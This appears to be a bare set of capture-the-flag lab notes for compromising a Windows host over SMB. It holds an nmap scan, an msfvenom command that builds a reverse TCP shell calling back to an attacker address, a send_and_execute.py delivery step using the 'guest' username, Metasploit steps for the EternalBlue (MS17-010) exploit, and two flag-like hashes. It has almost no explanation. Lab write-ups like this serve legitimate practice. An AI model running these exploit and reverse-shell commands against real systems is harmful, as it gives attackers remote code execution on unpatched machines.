nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
send_and_execute.py
裡面的 username
guest
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
python send_and_execute.py 10.129.216.62 ../shellx64.exe
msfconsole
use windows/smb/ms17_010_eternalblue
set RHOSTS 10.129.216.62
set LHOST 10.10.16.35
run
ff548eb71e920ff6c08843ce9df4e717
4c546aea7dbee75cbd71de245c8deea9